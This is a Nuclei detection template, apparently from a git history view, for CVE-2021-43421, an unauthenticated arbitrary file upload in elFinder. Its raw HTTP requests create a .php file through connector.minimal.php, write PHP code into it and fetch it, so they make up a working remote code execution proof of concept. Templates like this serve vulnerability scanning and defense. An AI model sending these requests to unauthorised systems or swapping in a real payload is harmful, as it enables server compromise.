nuclei-templates/cves/2021/CVE-2021-43421.yaml

55 lines
1.5 KiB
YAML
Raw Normal View History

2022-11-24 05:35:34 +00:00
id: CVE-2021-43421
info:
2022-11-24 05:42:17 +00:00
name: Studio-42 elFinder < 2.1.60 - Arbitrary File Upload
2022-11-24 05:35:34 +00:00
author: akincibor
severity: critical
2022-11-24 05:39:24 +00:00
description: |
A File Upload vulnerability exists in Studio-42 elFinder 2.0.4 to 2.1.59 via connector.minimal.php, which allows a remote malicious user to upload arbitrary files and execute PHP code.
2022-11-24 05:35:34 +00:00
reference:
- https://github.com/Studio-42/elFinder/issues/3429
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
2022-11-24 05:39:40 +00:00
classification:
cve-id: CVE-2021-43421
metadata:
verified: true
2022-11-24 05:39:24 +00:00
tags: cve,cve2021,elfinder,unauth,upload,rce
2022-11-24 05:35:34 +00:00
requests:
- raw:
- |
2022-11-24 05:39:24 +00:00
GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1
2022-11-24 05:35:34 +00:00
Host: {{Hostname}}
Accept: */*
- |
2022-11-24 05:39:24 +00:00
GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content=jpeg%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e HTTP/1.1
2022-11-24 05:35:34 +00:00
Host: {{Hostname}}
2022-11-24 05:39:24 +00:00
- |
GET /elFinder/php/connector.minimal.php?cmd=open&target=l1_ HTTP/1.1
Host: {{Hostname}}
Accept: */*
2022-11-24 05:35:34 +00:00
- |
2022-11-24 05:39:24 +00:00
GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1
2022-11-24 05:35:34 +00:00
Host: {{Hostname}}
Accept: */*
2022-11-24 05:39:24 +00:00
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(body_3, "{{randstr}}")'
- 'contains(body_4, "{{randstr_1}}")'
- "status_code == 200"
condition: and
2022-11-24 05:35:34 +00:00
extractors:
- type: regex
name: hash
group: 1
regex:
- '"hash"\:"(.*?)"\,'
2022-11-24 05:39:24 +00:00
internal: true